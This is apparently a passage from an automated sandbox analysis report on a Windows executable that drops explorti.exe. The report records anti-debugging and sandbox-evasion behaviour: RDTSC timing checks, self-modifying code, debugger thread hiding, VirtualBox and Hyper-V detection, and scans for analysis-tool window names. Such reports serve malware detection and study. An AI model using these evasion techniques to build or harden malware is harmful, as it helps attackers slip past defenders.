                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BE6 second address: 5420BFA instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, cx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, 7Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420BFA second address: 5420C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C24 second address: 5420C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2A4Ah 0x00000007 mov bh, A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929E9h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C4D second address: 5420C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C5D second address: 5420C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C61 second address: 5420C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Ah 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5420C76 second address: 5420C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A0682 second address: 54A0686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A0686 second address: 54A068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A068A second address: 54A0690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A0690 second address: 54A0696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A0696 second address: 54A069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A069A second address: 54A06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4688C929DEh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A06D2 second address: 54A06D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A06D8 second address: 54A06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A06DC second address: 54A070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C1B779h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B76Dh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54A070F second address: 54A071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54909F3 second address: 5490A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B779h 0x0000000b and cx, 6646h 0x00000010 jmp 00007F4688C1B771h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490A33 second address: 5490A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490A39 second address: 5490A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, BBh 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 mov al, dl 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4688C1B779h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430271 second address: 5430277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430277 second address: 543027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 543027B second address: 543028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 543028A second address: 543028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 543028E second address: 5430294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490CDA second address: 5490D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A7h 0x00000005 mov esi, 3B3E9733h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F4688C1B776h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F4688C1B770h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d jmp 00007F4688C1B770h 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B76Eh 0x0000002c add cx, 4CC8h 0x00000031 jmp 00007F4688C1B76Bh 0x00000036 popfd 0x00000037 mov ah, 22h 0x00000039 popad 0x0000003a push 5DF8A268h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C1B777h 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490D68 second address: 5490D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5DF9A26Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929DDh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490D9B second address: 5490DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5490DDF second address: 5490DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440501 second address: 5440505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440505 second address: 544050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544050B second address: 544056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C1B770h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F4688C1B770h 0x00000017 push 09B2C9E3h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4688C1B76Dh 0x00000025 or ax, 3506h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544056E second address: 54405B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 7F4B09FBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C929DDh 0x00000018 and cx, 7D16h 0x0000001d jmp 00007F4688C929E1h 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edi, ecx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54405B4 second address: 54405FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007F4688C1B769h 0x0000000f jmp 00007F4688C1B770h 0x00000014 push eax 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4688C1B76Bh 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54405FB second address: 5440618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440618 second address: 544061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544061F second address: 544065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b call 00007F4688C929DBh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 call 00007F4688C929E6h 0x00000017 push eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544065B second address: 544065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544065F second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440665 second address: 54406A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F4688C1B770h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B777h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54406A9 second address: 54406AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54406AF second address: 54406B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54406B3 second address: 544078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 pushfd 0x00000016 jmp 00007F4688C929DDh 0x0000001b or al, FFFFFFC6h 0x0000001e jmp 00007F4688C929E1h 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007F4688C929DEh 0x0000002b sub esp, 1Ch 0x0000002e pushad 0x0000002f pushad 0x00000030 mov cl, 1Ch 0x00000032 pushfd 0x00000033 jmp 00007F4688C929E9h 0x00000038 sub cx, 4586h 0x0000003d jmp 00007F4688C929E1h 0x00000042 popfd 0x00000043 popad 0x00000044 pushfd 0x00000045 jmp 00007F4688C929E0h 0x0000004a add cx, 8828h 0x0000004f jmp 00007F4688C929DBh 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F4688C929E6h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 544078C second address: 5440792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440792 second address: 54407E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4688C929E6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F4688C929E6h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F4688C929DCh 0x00000023 pop ecx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54407E9 second address: 54407F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bl 0x00000008 popad 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54407F8 second address: 5440837 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 34ED4AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4688C929E5h 0x00000014 adc eax, 5B01D476h 0x0000001a jmp 00007F4688C929E1h 0x0000001f popfd 0x00000020 mov ch, 0Fh 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440837 second address: 5440854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B779h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440854 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F4688C929DDh 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 jmp 00007F4688C929DEh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b pushad 0x0000001c mov eax, 544A8F7Dh 0x00000021 call 00007F4688C929DAh 0x00000026 push eax 0x00000027 pop edi 0x00000028 pop ecx 0x00000029 popad 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4688C929DFh 0x00000035 jmp 00007F4688C929E3h 0x0000003a popfd 0x0000003b push ecx 0x0000003c pop edx 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54408C0 second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F4688C1B76Ch 0x0000000c sub esi, 3667A318h 0x00000012 jmp 00007F4688C1B76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 1CEE25 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 1CEEFF instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 363775 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 38FF78 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 1CEDF9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSpecial instruction interceptor: First address: 3F3B3C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: EFEE25 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: EFEEFF instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 1093775 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 10BFF78 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: EFEDF9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 1123B3C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeCode function: 0_2_05490C90 rdtsc 0_2_05490C90
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 364Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396Thread sleep time: -64032s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8184Thread sleep time: -60030s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156Thread sleep count: 364 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156Thread sleep time: -10920000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5924Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8176Thread sleep time: -52026s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172Thread sleep time: -62031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104Thread sleep time: -62031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                    Source: explorti.exe, 00000007.00000002.2880581504.0000000000729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: gNo9ad9KO4.exe, 00000000.00000002.1680292366.0000000000344000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1706138398.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1720919181.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
